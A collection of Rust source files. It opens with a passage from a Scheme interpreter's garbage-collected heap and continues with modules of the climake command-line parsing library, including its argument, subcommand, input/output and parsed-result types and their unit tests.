activations: acts, procedures: procs, global_activation: global_act, roots: vec!(), symbol_table: HashMap::new(), allocations: 0, allocations_threshold: 0, locations: HashMap::new() }; h.reset_gc_pressure(); h } } /// ## `Heap` Allocation Methods impl Heap { /// Allocate a new cons cell and return a pointer to it. /// /// ## Panics /// /// Panics if the `Arena` for cons cells has already reached capacity. 
pub fn allocate_cons(&mut self) -> RootedConsPtr { self.on_allocation(); let c = self.cons_cells.allocate(); Rooted::new(self, c) } /// Allocate a new string and return a pointer to it. /// /// ## Panics /// /// Panics if the `Arena` for strings has already reached capacity. pub fn allocate_string(&mut self) -> RootedStringPtr { self.on_allocation(); let s = self.strings.allocate(); Rooted::new(self, s) } /// Allocate a new `Activation` and return a pointer to it. /// /// ## Panics /// /// Panics if the `Arena` for activations has already reached capacity. pub fn allocate_activation(&mut self) -> RootedActivationPtr { self.on_allocation(); let a = self.activations.allocate(); Rooted::new(self, a) } /// Allocate a new `Procedure` and return a pointer to it. /// /// ## Panics /// /// Panics if the `Arena` for procedures has already reached capacity. pub fn allocate_procedure(&mut self) -> RootedProcedurePtr { self.on_allocation(); let p = self.procedures.allocate(); Rooted::new(self, p) } } /// ## `Heap` Methods for Garbage Collection impl Heap { /// Perform a garbage collection on the heap. pub fn collect_garbage(&mut self) { self.reset_gc_pressure(); // First, trace the heap graph and mark everything that is reachable. let mut pending_trace = self.get_roots(); while !pending_trace.is_empty() { let mut newly_pending_trace = vec!(); for thing in pending_trace.drain() { if !thing.is_marked() { thing.mark(); for referent in thing.trace() { newly_pending_trace.push(referent); } } } pending_trace.append(&mut newly_pending_trace); } // Second, sweep each `ArenaSet`. self.strings.sweep(); self.activations.sweep(); self.cons_cells.sweep(); self.procedures.sweep(); } /// Explicitly add the given GC thing as a root. pub fn add_root(&mut self, root: GcThing) { for pair in self.roots.iter_mut() { let (ref r, ref mut count) = *pair; if *r == root { *count += 1; return; } } self.roots.push((root, 1)); } /// Unroot a GC thing that was explicitly rooted with `add_root`. 
pub fn drop_root<T: ToGcThing>(&mut self, root: &Rooted<T>) { if let Some(r) = root.to_gc_thing() { self.roots = self.roots.iter().fold(vec!(), |mut v, pair| { let (ref rr, ref count) = *pair; if r == *rr { if *count == 1 { return v; } else { v.push((*rr, *count - 1)); } } else { v.push((*rr, *count)); } return v; }); } } /// Apply pressure to the GC, and if enough pressure has built up, then /// perform a garbage collection. pub fn increase_gc_pressure(&mut self) { self.allocations += 1; if self.is_too_much_pressure() { self.collect_garbage(); } } /// Get a vector of all of the GC roots. fn get_roots(&self) -> Vec<GcThing> { let mut roots: Vec<GcThing> = self.symbol_table .values() .map(|s| GcThing::from_string_ptr(*s)) .collect(); roots.push(GcThing::from_activation_ptr(self.global_activation)); for pair in self.roots.iter() { let (ref root, _) = *pair; roots.push(*root); } for cons in self.locations.keys() { roots.push(GcThing::from_cons_ptr(*cons)); } roots } /// A method that should be called on every allocation. fn on_allocation(&mut self) { self.increase_gc_pressure(); } /// Returns true when we have built up too much GC pressure, and it is time /// to collect garbage. False otherwise. fn is_too_much_pressure(&mut self) -> bool { self.allocations > self.allocations_threshold } /// Resets the GC pressure, so that it must build all the way back up to the /// max again before a GC is triggered. #[inline] fn reset_gc_pressure(&mut self) { self.allocations = 0; self.allocations_threshold = ((self.cons_cells.capacity / 2) * self.cons_cells.arenas.len()) + ((self.strings.capacity / 2) * self.strings.arenas.len()) + ((self.activations.capacity / 2) * self.activations.arenas.len()) + ((self.procedures.capacity / 2) * self.procedures.arenas.len()); } } /// ## `Heap` Environment Methods impl Heap { /// Get the global activation. 
pub fn global_activation(&mut self) -> RootedActivationPtr { let act = self.global_activation; Rooted::new(self, act) } /// Extend the environment with a new lexical block containing the given /// variables and then perform some work before popping the new block. pub fn with_extended_env<T>(&mut self, names: Vec<String>, block: &Fn(&mut Heap) -> T) -> T { self.environment.extend(names); let result = block(self); self.environment.pop(); result } } /// ## `Heap` Methods for Source Locations impl Heap { /// Register the given pair as having originated from the given location. pub fn enlocate(&mut self, loc: Location, cons: RootedConsPtr) { self.locations.insert(*cons, loc); } /// Get the registered source location of the given pair. If the pair was /// not created by the reader, then None is returned. pub fn locate(&self, cons: &RootedConsPtr) -> Location { self.locations.get(&**cons) .map(|loc| loc.clone()) .unwrap_or_else(Location::unknown) } } /// ## `Heap` Methods for Symbols impl Heap { /// Ensure that there is an interned symbol extant for the given `String` /// and return it. 
pub fn get_or_create_symbol(&mut self, str: String) -> RootedValue { if self.symbol_table.contains_key(&str) { let sym_ptr = self.symbol_table[str]; let rooted_sym_ptr = Rooted::new(self, sym_ptr); return Value::new_symbol(self, rooted_sym_ptr); } let mut symbol = self.allocate_string(); symbol.clear(); symbol.push_str(str.as_slice()); self.symbol_table.insert(str, *symbol); return Value::new_symbol(self, symbol); } pub fn quote_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("quote".to_string()) } pub fn if_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("if".to_string()) } pub fn begin_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("begin".to_string()) } pub fn define_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("define".to_string()) } pub fn set_bang_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("set!".to_string()) } pub fn unspecified_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("unspecified".to_string()) } pub fn lambda_symbol(&mut self) -> RootedValue { self.get_or_create_symbol("lambda".to_string()) } pub fn eof_symbol(&mut self) -> RootedValue { // Per R4RS, the EOF object must be something that is impossible to // read. We fulfill that contract by having spaces in a symbol. self.get_or_create_symbol("< END OF FILE >".to_string()) } } /// An iterable of `GcThing`s. pub type IterGcThing = IntoIter<GcThing>; /// The `Trace` trait allows GC participants to inform the collector of their /// references to other GC things. /// /// For example, imagine we had a `Trio` type that contained three cons cells: /// /// struct Trio { /// first: ConsPtr, /// second: ConsPtr, /// third: ConsPtr, /// } /// /// `Trio`'s implementation of `Trace` must yield all of its cons pointers, or /// else their referents could be reclaimed by the garbage collector, and the /// `Trio` would have dangling pointers, leading to undefined behavior and bad /// things when it dereferences them in the future. 
/// /// impl Trace for Trio { /// fn trace(&self) -> IterGcThing { /// let refs = vec!(GcThing::from_cons_ptr(self.first), /// GcThing::from_cons_ptr(self.second), /// GcThing::from_cons_ptr(self.third)); /// refs.into_iter() /// } /// } pub trait Trace { /// Return an iterable of all of the GC things referenced by this structure. fn trace(&self) -> IterGcThing; } /// The union of the various types that are GC things. #[derive(Copy, Eq, Hash, PartialEq, Debug)] pub enum GcThing { Cons(ConsPtr), String(StringPtr), Activation(ActivationPtr), Procedure(ProcedurePtr), } /// ## `GcThing` Constructors impl GcThing { /// Create a `GcThing` from a `StringPtr`. pub fn from_string_ptr(str: StringPtr) -> GcThing { GcThing::String(str) } /// Create a `GcThing` from a `ConsPtr`. pub fn from_cons_ptr(cons: ConsPtr) -> GcThing { GcThing::Cons(cons) } /// Create a `GcThing` from a `ProcedurePtr`. pub fn from_procedure_ptr(procedure: ProcedurePtr) -> GcThing { GcThing::Procedure(procedure) } /// Create a `GcThing` from an `ActivationPtr`. pub fn from_activation_ptr(act: ActivationPtr) -> GcThing { GcThing::Activation(act) } } impl GcThing { /// During a GC, mark this `GcThing` as reachable. #[inline] fn mark(&self) { match *self { GcThing::Cons(ref p) => p.mark(), GcThing::String(ref p) => p.mark(), GcThing::Activation(ref p) => p.mark(), GcThing::Procedure(ref p) => p.mark(), } } /// During a GC, determine if this `GcThing` has been marked as reachable. #[inline] fn is_marked(&self) -> bool { match *self { GcThing::Cons(ref p) => p.is_marked(), GcThing::String(ref p) => p.is_marked(), GcThing::Activation(ref p) => p.is_marked(), GcThing::Procedure(ref p) => p.is_marked(), } } } impl Trace for GcThing { fn trace(&self) -> IterGcThing { match *self { GcThing::Cons(cons) => cons.trace(), GcThing::Activation(act) => act.trace(), GcThing::Procedure(p) => p.trace(), // Strings don't hold any strong references to other `GcThing`s. 
GcThing::String(_) => vec!().into_iter(), } } } #[test] fn test_heap_allocate_tons() { use eval::evaluate_file; let heap = &mut Heap::new(); evaluate_file(heap, "./tests/test_heap_allocate_tons.scm") .ok() .expect("Should be able to eval a file."); assert!(true, "Should have successfully run the program and allocated many cons cells"); }
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/prelude.rs
src/prelude.rs
//! Prelude for climake to allow easy importing of data structures //! //! # Contents //! //! This prelude is small as climake itself isn't a woefully complex library, //! here's what this prelude includes: //! //! - Base-level //! - [climake::Argument](Argument) //! - [climake::CliMake](CliMake) //! - [climake::Subcommand](Subcommand) //! - IO structures //! - [climake::io::Data](Data) //! - [climake::io::Input](Input) //! - Parsed structures //! - [climake::parsed::ParsedArgument](ParsedArgument) //! - [climake::parsed::ParsedCli](ParsedCli) //! - [climake::parsed::ParsedSubcommand](ParsedSubcommand) pub use crate::io::{Data, Input}; pub use crate::parsed::{ParsedArgument, ParsedCli, ParsedSubcommand}; pub use crate::{Argument, CliMake, Subcommand};
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/lib.rs
src/lib.rs
//! The simplistic, dependency-free cli library ✨ //! //! - **[Documentation](https://docs.rs/climake)** //! - [Crates.io](https://crates.io/crates/climake) //! //! # Example 📚 //! //! Demo of a simple package manager: //! //! ```rust //! use climake::prelude::*; //! //! fn main() { //! let package = Argument::new( //! "The package name", //! vec!['p', 'i'], //! vec!["pkg, package"], //! Input::Text, //! ); //! //! let add = Subcommand::new("add", vec![&package], vec![], "Adds a package"); //! let rem = Subcommand::new("rem", vec![&package], vec![], "Removes a package"); //! //! let cli = CliMake::new( //! "MyPkg", //! vec![], //! vec![&add, &rem], //! "A simple package manager demo", //! "1.0.0", //! ); //! //! let parsed = cli.parse(); //! //! for subcommand in parsed.subcommands { //! if subcommand.inner == &add { //! println!("Adding package {:?}..", subcommand.arguments[0]); //! } else if subcommand.inner == &rem { //! println!("Removing package {:?}..", subcommand.arguments[0]); //! } //! } //! } //! ``` //! //! ## Installation 🚀 //! //! Simply add the following to your `Cargo.toml` file: //! //! ```toml //! [dependencies] //! climake = "3.0.0-pre.1" # rewrite isn't out just yet! //! ``` //! //! # License //! //! This library is duel-licensed under both the [MIT License](https://opensource.org/licenses/MIT) //! ([`LICENSE-MIT`](https://github.com/rust-cli/climake/blob/master/LICENSE-MIT)) //! and [Apache 2.0 License](https://www.apache.org/licenses/LICENSE-2.0) //! ([`LICENSE-APACHE`](https://github.com/rust-cli/climake/blob/master/LICENSE-APACHE)), //! you may choose at your discretion. #![forbid(unsafe_code)] #![doc( html_logo_url = "https://github.com/rust-cli/climake/raw/master/logo.png", html_favicon_url = "https://github.com/rust-cli/climake/raw/master/logo.png" )] /// Default help message for [Argument]s without help added const HELP_DEFAULT: &str = "No help provided"; /// Tabs to render for cli arguments. 
This will be subtracted from 80 char width /// of terminals allowed so spaces are reccomended const CLI_TABBING: &str = " "; mod core; pub mod io; pub mod parsed; pub mod prelude; pub use crate::core::*;
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/io.rs
src/io.rs
//! Input and output structures for climake which allow inputs for args along //! with outputs passed back //! //! # Importing //! //! This module is included in [crate::prelude] by default so no extra importing //! steps are required (unless you are importing explicit items). use std::fmt; use std::path::PathBuf; /// An input type, typically given for an [Argument](crate::Argument) to descibe /// what types are allowed to be passwed in. This is then transferred to [Data] /// once the cli has been executed #[derive(Debug, PartialEq, Clone)] pub enum Input { /// No input allowed, will error if any is given. Maps to [Data::None] None, /// Text input allowed, this will return an empty string if no text is supplied. /// Maps to [Data::Text] Text, /// A single [PathBuf] given to the argument, these are not certain to exist /// and simply echo the user's input. Maps to [Data::Path] Path, /// Multiple [PathBuf]s given to the argument, these are not certain to exist /// and simply echo the user's input. Maps to [Data::Paths] Paths, } impl fmt::Display for Input { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { // formatting has a space on existing words on purpouse for help generation match self { Input::None => write!(f, ""), Input::Text => write!(f, "[text] "), Input::Path => write!(f, "[path] "), Input::Paths => write!(f, "[paths] "), } } } /// Outputted data from parsing a cli for each argument. This enumeration is based /// upon the allowed [Input] of a given [Argument](crate::Argument) and maps /// directly to the input /// /// # Mappings from [Input] /// /// If a user requested for an [Argument](crate::Argument) to be of [Input::Path], /// once parsed this enumeration would be [Data::Path] (in corrospondance with /// the name). /// #[derive(Debug, PartialEq, Clone)] pub enum Data { /// No data provided, from [Input::None] None, /// Textual input provided, from [Input::Text]. 
This may be an empty string /// in the case of the user not actually providing input Text(String), /// Path input provided, from [Input::Path]. This may be an empty or invalid /// [PathBuf] in the case of user input being misleading or non-existant Path(PathBuf), /// Multiple path inputs provided, from [Input::Paths]. This may be an empty /// vector (i.e. length 0) if the user doesn't provide any paths or may be /// non-existant paths given from user input Paths(Vec<PathBuf>), } impl Data { /// Creates a new [Data] from with types mapping from [Input] using passed /// `data`. This may map the `data` string vec into types such as `PathBuf` pub(crate) fn new(input: Input, data: impl IntoIterator<Item = String>) -> Self { match input { Input::None => Data::None, // ignore passed `data` (if any) Input::Text => match data.into_iter().next() { Some(text) => Data::Text(text), None => Data::Text(String::new()), }, Input::Path => match data.into_iter().next() { Some(path_string) => Data::Path(PathBuf::from(path_string)), None => Data::Path(PathBuf::new()), }, Input::Paths => Data::Paths( data.into_iter() .map(|path_string| PathBuf::from(path_string)) .collect(), ), } } } #[cfg(test)] mod tests { use super::*; /// Checks that the [Data::new] method works correctly #[test] fn data_new() { let testval = String::from("Hi!"); // Data::None assert_eq!(Data::new(Input::None, vec![]), Data::None); assert_eq!(Data::new(Input::None, vec![testval.clone()]), Data::None); // Data::Text assert_eq!(Data::new(Input::Text, vec![]), Data::Text(String::new())); assert_eq!( Data::new(Input::Text, vec![testval.clone()]), Data::Text(testval.clone()) ); assert_eq!( Data::new(Input::Text, vec![testval.clone(), testval.clone()]), Data::Text(testval.clone()) ); // Data::Path assert_eq!(Data::new(Input::Path, vec![]), Data::Path(PathBuf::new())); assert_eq!( Data::new(Input::Path, vec![testval.clone()]), Data::Path(PathBuf::from(testval.clone())) ); assert_eq!( Data::new(Input::Path, 
vec![testval.clone(), testval.clone()]), Data::Path(PathBuf::from(testval.clone())) ); // Data::Paths assert_eq!(Data::new(Input::Paths, vec![]), Data::Paths(vec![])); assert_eq!( Data::new(Input::Paths, vec![testval.clone()]), Data::Paths(vec![PathBuf::from(testval.clone())]) ); assert_eq!( Data::new(Input::Paths, vec![testval.clone(), testval.clone()]), Data::Paths(vec![PathBuf::from(testval.clone()), PathBuf::from(testval)]) ); } }
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/parsed.rs
src/parsed.rs
//! Structures that allow the containing of completed parsing from the cli //! //! # Importing //! //! This module is included in [crate::prelude] by default so no extra importing //! steps are required (unless you are importing explicit items). use crate::io::Data; use crate::{Argument, Subcommand}; /// Used argument stemming from [CliMake::parse](crate::CliMake::parse)-related /// parsing /// /// This structure contains a reference to the underlying argument and data passed /// by user (if any). /// /// # Implementations /// /// This structure may be converted into a raw [Argument] with the use of the /// [From]<[ParsedArgument]> implementation or similarly to the [Data] used for /// this argument. #[derive(Debug, PartialEq, Clone)] pub struct ParsedArgument<'a> { /// Reference to the argument used pub inner: &'a Argument<'a>, /// Passed data for this argument pub data: Data, } impl<'a> From<ParsedArgument<'a>> for &'a Argument<'a> { fn from(parsed_argument: ParsedArgument<'a>) -> Self { parsed_argument.inner } } impl<'a> From<ParsedArgument<'a>> for Data { fn from(parsed_argument: ParsedArgument<'a>) -> Self { parsed_argument.data } } /// Used subcommand stemming from [CliMake::parse](crate::CliMake::parse)-related /// parsing /// /// This strcuture contains a reference to the underlying subcommand and all other /// subcommands/arguments below that in a similar [ParsedSubcommand]/[ParsedArgument] /// recursion. /// /// # Implementations /// /// This structure may be converted into a raw [Subcommand] with the use of the /// [From]<[ParsedSubcommand]> implementation or similarly the [ParsedSubcommand::subcommands] /// and [ParsedSubcommand::arguments] vectors. 
#[derive(Debug, PartialEq, Clone)] pub struct ParsedSubcommand<'a> { /// Reference to the subcommand used pub inner: &'a Subcommand<'a>, /// Used subcommands contained inside of this subcommand (if any) pub subcommands: Vec<ParsedSubcommand<'a>>, /// Used arguments contained inside of this subcommand (if any) pub arguments: Vec<ParsedArgument<'a>>, } impl<'a> ParsedSubcommand<'a> { /// Internal method which creates a new, empty [ParsedSubcommand] for use /// whilst parsing pub(crate) fn new_empty(subcommand: &'a Subcommand<'a>) -> Self { Self { inner: subcommand, subcommands: vec![], arguments: vec![], } } } impl<'a> From<ParsedSubcommand<'a>> for &'a Subcommand<'a> { fn from(parsed_subcommand: ParsedSubcommand<'a>) -> Self { parsed_subcommand.inner } } impl<'a> From<ParsedSubcommand<'a>> for Vec<ParsedSubcommand<'a>> { fn from(parsed_subcommand: ParsedSubcommand<'a>) -> Self { parsed_subcommand.subcommands } } impl<'a> From<ParsedSubcommand<'a>> for Vec<ParsedArgument<'a>> { fn from(parsed_subcommand: ParsedSubcommand<'a>) -> Self { parsed_subcommand.arguments } } /// Similar to [ParsedSubcommand], contains the top-level parsed arguments from /// [CliMake::parse](crate::CliMake::parse)-related parsing /// /// # Implementations /// /// This structure may be converted into a vector of subcommands from [ParsedCli::subcommands] /// or arguments from [ParsedCli::arguments]. #[derive(Debug, PartialEq, Clone)] pub struct ParsedCli<'a> { /// Used subcommands contained inside of top-level parsed pub subcommands: Vec<ParsedSubcommand<'a>>, /// Used arguments contained inside of top-level parsed pub arguments: Vec<ParsedArgument<'a>>, } impl<'a> From<ParsedCli<'a>> for Vec<ParsedSubcommand<'a>> { fn from(used_cli: ParsedCli<'a>) -> Self { used_cli.subcommands } } impl<'a> From<ParsedCli<'a>> for Vec<ParsedArgument<'a>> { fn from(used_cli: ParsedCli<'a>) -> Self { used_cli.arguments } }
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/core/argument.rs
src/core/argument.rs
//! Contains [Argument]-related items, see specific documentation for more information use super::utils::writeln_term; use crate::io::Input; use crate::HELP_DEFAULT; use std::fmt; use std::io::Write; /// An argument attached to the cli, allowing passing of user data to the top-level /// cli or subcommands #[derive(Debug, PartialEq, Clone)] pub struct Argument<'a> { /// Optional help message help: Option<&'a str>, /// Many [CallType]s corrosponding to this argument calls: Vec<CallType>, /// [Input] type allowed for this argument input: Input, /// Required argument for given root cli or [Subcommand](crate::Subcommand). /// If this argument is not present whilst the cli parses, it will provide an /// apt error /// /// To change the default behaviour of `false` (not required), simply modify /// this value before it's time to parse. required: bool, } impl<'a> Argument<'a> { /// Creates a new [Argument] from given passed values pub fn new( help: impl Into<Option<&'a str>>, short_calls: impl IntoIterator<Item = char>, long_calls: impl IntoIterator<Item = &'a str>, input: impl Into<Input>, ) -> Self { let mut calls: Vec<CallType> = short_calls .into_iter() .map(|call| CallType::Short(call)) .collect(); calls.append( &mut long_calls .into_iter() .map(|call| CallType::Long(call.to_string())) .collect::<Vec<CallType>>(), ); Self { help: help.into(), calls, input: input.into(), required: false, } } /// Adds a single short call, chainable pub fn add_scall(&mut self, short_call: impl Into<char>) -> &mut Self { self.calls.push(short_call.into().into()); self } /// Adds multiple short calls, chainable pub fn add_scalls(&mut self, short_calls: impl IntoIterator<Item = char>) -> &mut Self { for c in short_calls.into_iter() { self.add_scall(c); } self } /// Adds a single long call, chainable pub fn add_lcall(&mut self, long_call: impl Into<String>) -> &mut Self { self.calls.push(long_call.into().into()); self } /// Adds multiple long calls, chainable pub fn add_lcalls(&mut self, 
long_calls: impl IntoIterator<Item = String>) -> &mut Self { for c in long_calls.into_iter() { self.add_lcall(c); } self } /// Generates compact help message for current [Argument] /// /// This writes directly to a buffer of some kind (typically [std::io::stdout]) /// for simplicity, perf and extendability reasons. /// /// # Example /// /// What this may look like: /// /// ```none /// (-v, --verbose) — Verbose mode /// ``` pub(crate) fn help_name_msg(&self, buf: &mut impl Write) -> std::io::Result<()> { let mut lc_buf: Vec<String> = Vec::new(); let mut sc_buf: Vec<char> = Vec::new(); for call in self.calls.iter() { match call { CallType::Long(call) => lc_buf.push(format!("--{}", call)), CallType::Short(call) => sc_buf.push(*call), } } let short_calls: String = if sc_buf.len() == 0 { String::new() } else { format!("-{}", sc_buf.iter().collect::<String>()) }; let mut formatted_calls = vec![short_calls]; formatted_calls.append(&mut lc_buf); let formatted_help = match self.help { Some(msg) => msg, None => HELP_DEFAULT, }; let required_msg = if self.required { "[REQUIRED] " } else { "" }; writeln_term( if formatted_calls.len() == 1 && formatted_calls[0] != "" { format!( "{} {}{}— {}", formatted_calls[0], self.input, required_msg, formatted_help ) } else { format!( "({}) {}{}— {}", formatted_calls.join(", "), self.input, required_msg, formatted_help, ) }, buf, ) } } /// A single type of call for an [Argument], can be a short call or a long call #[derive(Debug, PartialEq, Clone)] pub(crate) enum CallType { /// Short, single-char call, e.g. `-h` Short(char), /// Long, multi-char call, e.g. 
`--hello` Long(String), } impl fmt::Display for CallType { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { match self { CallType::Short(c) => write!(f, "{}", c), CallType::Long(string) => write!(f, "--{}", string), } } } impl From<CallType> for String { fn from(calltype: CallType) -> Self { match calltype { CallType::Short(c) => String::from(c), CallType::Long(string) => string, } } } impl From<char> for CallType { fn from(c: char) -> Self { CallType::Short(c) } } impl From<String> for CallType { fn from(string: String) -> Self { CallType::Long(string) } } #[cfg(test)] mod tests { use super::*; /// Checks that the [Argument::new] method (creation of arguments) works correctly #[test] fn arg_new() { assert_eq!( Argument::new(None, vec!['a', 'b'], vec!["hi", "there"], Input::Text), Argument { calls: vec![ CallType::Short('a'), CallType::Short('b'), CallType::Long("hi".to_string()), CallType::Long("there".to_string()) ], help: None, input: Input::Text, required: false, } ) } /// Checks that the [Argument::help_name_msg] method works correctly #[test] fn name_help() -> std::io::Result<()> { let mut chk_vec: Vec<u8> = vec![]; Argument::new(None, vec![], vec![], Input::None).help_name_msg(&mut chk_vec)?; assert_eq!( std::str::from_utf8(chk_vec.as_slice()).unwrap(), " () — No help provided\n" ); chk_vec = vec![]; Argument::new("Some simple help", vec!['a'], vec!["long"], Input::Text) .help_name_msg(&mut chk_vec)?; assert_eq!( std::str::from_utf8(chk_vec.as_slice()).unwrap(), " (-a, --long) [text] — Some simple help\n" ); chk_vec = vec![]; Argument::new(None, vec!['a'], vec![], Input::Text).help_name_msg(&mut chk_vec)?; assert_eq!( std::str::from_utf8(chk_vec.as_slice()).unwrap(), " -a [text] — No help provided\n" ); Ok(()) } /// Checks that the [Argument::help_name_msg] method works correctly with [Argument::required] /// set to `true` #[test] fn name_help_required() -> std::io::Result<()> { let mut chk_vec: Vec<u8> = vec![]; let mut arg = Argument::new("Some 
argument", vec!['s'], vec![], Input::None); arg.required = true; arg.help_name_msg(&mut chk_vec)?; assert_eq!( std::str::from_utf8(chk_vec.as_slice()).unwrap(), " -s [REQUIRED] — Some argument\n" ); Ok(()) } /// Checks that the [Argument::add_scall] method works correctly #[test] fn add_scall() { let mut arg = Argument::new("example", vec![], vec![], Input::None); arg.add_scall('a').add_scall('b').add_scall('c'); assert_eq!( arg, Argument::new("example", vec!['a', 'b', 'c'], vec![], Input::None) ) } /// Checks that the [Argument::add_scalls] method works correctly #[test] fn add_scalls() { let mut arg = Argument::new("example", vec![], vec![], Input::None); arg.add_scalls(vec!['a', 'b']).add_scalls(vec!['c']); assert_eq!( arg, Argument::new("example", vec!['a', 'b', 'c'], vec![], Input::None) ) } /// Checks that the [Argument::add_lcall] method works correctly #[test] fn add_lcall() { let mut arg = Argument::new("example", vec![], vec![], Input::None); arg.add_lcall("a").add_lcall("b").add_lcall("c"); assert_eq!( arg, Argument::new("example", vec![], vec!["a", "b", "c"], Input::None) ) } /// Checks that the [Argument::add_lcalls] method works correctly #[test] fn add_lcalls() { let mut arg = Argument::new("example", vec![], vec![], Input::None); arg.add_lcalls(vec!["a".to_string(), "b".to_string()]) .add_lcalls(vec!["c".to_string()]); assert_eq!( arg, Argument::new("example", vec![], vec!["a", "b", "c"], Input::None) ) } /// Checks that the [From]<[CallType]> implementation for [String] works correctly #[test] fn string_from_calltype() { assert_eq!(String::from(CallType::Short('h')), "h".to_string()); assert_eq!( String::from(CallType::Long("testing".to_string())), "testing".to_string() ); } }
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false
rust-cli/climake
https://github.com/rust-cli/climake/blob/07a87ab9e8721d01ce6e37c3107c69b835e83ee7/src/core/subcommand.rs
src/core/subcommand.rs
//! Contains [Subcommand]-related items, see specific documentation for more //! information use super::utils::writeln_term; use super::{Argument, CliMake}; use crate::HELP_DEFAULT; use std::io::Write; /// A subcommand attached to the cli, allowing commands and sections of the cli /// to form #[derive(Debug, PartialEq, Clone)] pub struct Subcommand<'a> { /// Name of subcommand, used both in help and as the single calling method pub name: &'a str, /// Argument(s) attached to this [Subcommand], if any pub arguments: Vec<&'a Argument<'a>>, /// Recursive subcommands attached to this [Subcommand], if any pub subcommands: Vec<&'a Subcommand<'a>>, /// Optional short description of this subcommand pub help: Option<&'a str>, } impl<'a> Subcommand<'a> { /// Creates a new subcommand from given abstracted inputs pub fn new( name: impl Into<&'a str>, arguments: impl Into<Vec<&'a Argument<'a>>>, subcommands: impl Into<Vec<&'a Subcommand<'a>>>, help: impl Into<Option<&'a str>>, ) -> Self { Self { name: name.into(), arguments: arguments.into(), subcommands: subcommands.into(), help: help.into(), } } /// Displays help infomation for this subcommand specifically which is used /// inside the execution of the cli /// /// A referenced [CliMake] is needed for this method due to it displaying a /// header message using [CliMake::header_msg] with an altered usage line, as /// seen in the examples. 
pub(crate) fn help_msg(&self, climake: &CliMake, buf: &mut impl Write) -> std::io::Result<()> { climake.header_msg(self.name, buf)?; match self.help { Some(help) => { buf.write("\nAbout:\n".as_bytes())?; writeln_term(help, buf)?; } None => (), }; // TODO: merge this into a utility func shared with CliMake::help_msg buf.write("\nArguments:\n".as_bytes())?; if self.arguments.len() > 0 { for argument in self.arguments.iter() { argument.help_name_msg(buf)?; } } else { buf.write(" No arguments found\n".as_bytes())?; } buf.write("\nSubcommands:\n".as_bytes())?; if self.subcommands.len() > 0 { for subcommand in self.subcommands.iter() { subcommand.help_name_msg(buf)?; } } else { buf.write(" No subcommands found\n".as_bytes())?; } Ok(()) } /// Generates compact help message for current [Subcommand] /// /// This writes directly to a buffer of some kind (typically [std::io::stdout]) /// for simplicity, perf and extendability reasons. /// /// # Example /// /// What this may look like: /// /// ```none /// example — A simple example subcommand /// ``` pub(crate) fn help_name_msg(&self, buf: &mut impl Write) -> std::io::Result<()> { let formatted_help = match self.help { Some(msg) => msg, None => HELP_DEFAULT, }; writeln_term(format!("{} — {}", self.name, formatted_help), buf) } } #[cfg(test)] mod tests { use super::*; /// Checks that the [Subcommand::help_name_msg] method works correctly #[test] fn name_help() -> std::io::Result<()> { let mut chk_vec: Vec<u8> = vec![]; Subcommand::new("command", vec![], vec![], "A simple command") .help_name_msg(&mut chk_vec)?; assert_eq!( std::str::from_utf8(chk_vec.as_slice()).unwrap(), " command — A simple command\n" ); Ok(()) } }
rust
Apache-2.0
07a87ab9e8721d01ce6e37c3107c69b835e83ee7
2026-01-04T20:21:15.127100Z
false